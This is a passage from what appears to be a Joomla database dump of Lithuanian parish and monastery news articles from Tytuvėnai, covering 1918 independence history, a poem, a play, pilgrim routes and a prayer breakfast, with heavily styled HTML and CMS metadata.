\'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/100laiko{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">„Vilnius, 1918 metų vasario 16-oji, šeštadienis. Įprasta nemaloni ir rūsti vasario diena – be saulės, ūkanota, drebia šlapias sniegas, pereinantis į lietų.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">Niūrus oras tarytum atspindi okupacijos, bado ir nepriteklių nualinto Vilniaus krašto gyventojų vidinę nuotaiką, sumišusią su neviltimi ir permainų laukimu.“ </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">Tokia išlikusi tos dienos detalė iš amžininkų prisiminimų...</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">O KAIP IR KADA ŽINIA APIE </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">LIETUVOS NEPRIKLAUSOMYBĖS AKTĄ PASIEKĖ TYTUVĖNUS?</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">Gal tai buvo1918 metų kovo 28 dienos laikraščio TĖVYNĖS SARGAS dvyliktas numeris. Tikėtina, kad laikraštį gaudavo Tytuvėnų klebonas Telesforas Mickevičius.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">Gerokai laiko aplamdytas spaudinys po šimto metų skelbia:</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">LIETUVA - NEPRIKLAUSOMA VALSTYBĖ</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\">Laikraštį TĖVYNĖS SARGAS ir kitus XIX-XX a. pradžios bažnyčios archyvo, krašto žmonių išsaugotas nuotraukas ir dokumentus galite pamatyti Tytuvėnų bernardinų vienuolyne.</span></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p> </p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"> </span></p>',1,0,0,44,'2018-02-21 06:09:50',135,'','2018-02-21 06:10:17',135,0,'0000-00-00 00:00:00','2018-02-21 06:09:50','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/laiko_zenklai\\/laiko zenklai.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,80,'','',1,2288,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(303,392,'PRO MEMORIA','pro-memoria','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Vasario 26 dieną minint kunigo Ričardo Mikutavičiaus gimtadienį–Tytuvėnų bernardinų vienuolyne koliažų paroda vienam jo eilėraščiui.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/mikutavicius/pro_memoria.jpg\" border=\"0\" width=\"300\" /></span></span></span></span></span></p>\r\n<h1>Aukojimo maldos skiemuo ir žodis</h1>\r\n<h3>Šventam miške Lainiškuose<br />tingios Šešupės glėbyje,<br />prie Mosėdžio pelkynų aukuro,<br />ties Medininkų pilimi,<br />Romovėse,<br />virš amžinos ugnies kaitrių liepsnų,<br />virš akmeninių piramidžių, virš laužų<br />akmens urve sukrešusiojo kraujo,<br />virš aukšto, aštriais kampais spygliuoto dūmų stulpo,<br />šešėlių, virpesių, aitrių garų,<br />virš plazdančio laužų šviesos pasaulio, <br />mirty išnykstančios aukos agonijos ir traukulių,<br />virš netikrų pagoniškos šventoves paslapčių,<br />blaškydamas nykumą, ilgesį ir alkį,<br />kaitra pagoniškų maldų skraidinas,<br />kerėjimų, aukojimų,<br />ir atgailų ir įžadų perėtas,<br />lizde Tautos širdies lukštus sausus palikęs,<br />išsidžiovinęs lipnią plunksnų drėgmę,<br />galiūnas skaisčiaplunksnis aisčių-<br />lietuvių genties DVASIOS<br />gražuolis paukštis skraido...</h3>\r\n<h3 style=\"text-align: justify;\"> </h3>\r\n<p> </p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"> </span></p>',1,0,0,44,'2018-02-28 05:12:20',135,'','2018-02-28 05:15:21',135,0,'0000-00-00 00:00:00','2018-02-28 05:12:20','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/mikutavicius\\/main1.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,79,'','',1,2281,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(304,393,'Spektaklis \"Amerika pirtyje\"','spektaklis-amerika-pirtyje','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kviečiame visus š.m. balandžio 27 d. 17 valandą į spektaklį Amerika pirtyje, kuris vyks Tytuvėnų vienuolyno refektorinėje salėje. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Bilieto kaina 3 eurai. Geras vakaras ir gera nuotaika garantuota.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\"><img src=\"images/stories/naujienos/amerika_pirtyje/full.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2018-03-06 21:20:29',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2018-03-06 21:20:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/amerika_pirtyje\\/amerika_pirtyje.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,78,'','',1,2362,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(305,394,'Švento Jokūbo piligrimų kelias Lietuvoje ','svento-jokubo-piligrimu-kelias-lietuvoje','','<h3 class=\"caption\" style=\"text-align: justify;\">Camino Lituano.</h3>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif;\"><span style=\"font-size: 13px;\">Šventasis Jokūbas – Jėzaus Kristaus mokinys, kuris, kaip tikima, pastarojo skleistą krikščionybės mokslą atnešė iki Ispanijos, iš kur jis vėliau pasklido po Europą ir tapo šio žemyno gyventojų savastimi. Siekiant įtvirtinti krikščioniškąją tapatybę, šventojo Jokūbo ženklu – kriaukle (legenda pasakoja, kad keliaudamas iš Jeruzalės iki Ispanijos miesto Santjago de Kompostelos šis apaštalas iš pakelės šaltinių kriaukle pasisemdavo vandens) žymimos Europos šventovės ir taip tiesiami vadinamieji šventojo Jokūbo keliai, skirti piligrimystei.  Kalbama, kad kriauklės briaunos simbolizuoja daug kelių, kuriuos įveikia piligrimai, galiausiai sueinančių į vieną tašką, šiuo atveju - Santjago de Komposteloje esančią Šv. Jokūbo katedrą, kurioje ilsisi jo palaikai. </span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif;\"><span style=\"font-size: 13px;\">Kriauklėmis sužymėtas visas Švento Jokūbo piligrimų kelias, dažniausiai jos naudojamos kartu su geltonos spalvos rodykle, nurodančia kelionės kryptį. Iki šiol per visą Europą besidriekiančių šventojo Jokūbo kelių, vedančių į kriauklėmis pažymėtas šventoves, pabaiga buvo Lenkija, dabar ir Lietuvoje tęsiasi šis kelią: 11 bažnyčių, pavadintų apaštalo šv. Jokūbo vardu bei kitos šventovės, sutinkamos piligrimų kelyje. </span></span></p>\r\n<p style=\"text-align: justify;\"><strong><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif;\"><span style=\"font-size: 13px;\">Tytuvėnų bernardinų bažnyčia ir vienuolynas pažymėti kriauklės ženklu - tai stotelė piligrimų kelyje.</span></span></strong></p>','',1,0,0,31,'2018-03-15 19:41:00',135,'','2018-06-12 15:28:28',135,0,'0000-00-00 00:00:00','2018-03-15 19:41:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,0,10,'','',1,8516,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(306,395,'Jono Pauliaus II piligrimų kelias','jono-pauliaus-ii-piligrimu-kelias','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif;\"><span style=\"font-size: 13px;\">Tytuvėnuose nuo seno puoselėjamos piligrimystės tradicijos. Piligrimai atvykdavo į tėvų bernardinų globojamą Tytuvėnų bažnyčios Kalvariją, melsdavosi Kristaus Kančios laiptų koplyčioje ir prie malonėmis garsėjančio Švč. Mergelės Marijos atvaizdo didžiajame altoriuje.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif;\"><span style=\"font-size: 13px;\">Nuo 2007 m. Tytuvėnus siekia Jono Pauliaus II piligrimų kelias, sujungiantis nuo amžių lietuviui šventas ir brangias vietas,  pavadintas šio Didžiojo Popiežiaus , „didžiojo keliauninko“ vardu, dėkingumo ir pagarbumo ženklan. Jis pasauliui padėjo išgirsti tylos bažnyčią. Jo užtariami lietuviai ir kitų šalių piligrimai  atras Lietuvos žemėje gyvus krikščioniškojo tikėjimo lobius. Jono Pauliaus II piligrimų kelio programą įtraukta 14 žymių maldos vietų Lietuvoje. </span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif;\"><span style=\"font-size: 13px;\">Nuo 2016 m. Tytuvėnų bažnyčios koplyčioje saugoma šventojo relikvija, čia kiekvieną mėnesį kviečiama rinktis į naktinę Šv. Sakramento adoraciją. Šv. Popiežiaus Jono Pauliaus II koplyčia  nauja traukos, o taip pat susikaupimo ir maldos vieta piligrimų kelyje.</span></span></p>','',1,0,0,31,'2018-03-15 20:07:48',135,'','2018-06-12 15:22:04',135,0,'0000-00-00 00:00:00','2018-03-15 20:07:48','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,9,'','',1,7671,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(307,396,'Maldos pusryčiai Tytuvėnuose','maldos-pusryciai-tytuvenuose1','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų bernardinų vienuolyno refektorinėje salėje, kovo vienuoliktąją  tradiciškai buvo rengiami maldos pusryčiai.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=600}stories/naujienos/kovo11/pics{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Ankstų sekmadienio rytą prasidėjusiame renginyje dalyvavo mokytojai, verslininkai, valdininkai, bendruomenių atstovai. Maldos pusryčius vedė Nijolė Saimininkienė, įžanginį žodį tarė Bronius Rudzevičius, maldai vadovavo kun. Rimantas Žaromskis. Pranešimą “Lietuvai 100 Ilgas kelias į nepriklausomybę” paruošė mokytojas Evaldas Butkus. Dainavo Tytuvėnų mokytojai. Svarbias Tytuvėnų bažnyčios datas susirinkusiems priminė Rūta Krencienė. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Maldos pusryčiai rengiami Vyrų katalikų brolijos iniciatyva, prisidėjo VšĮ “ 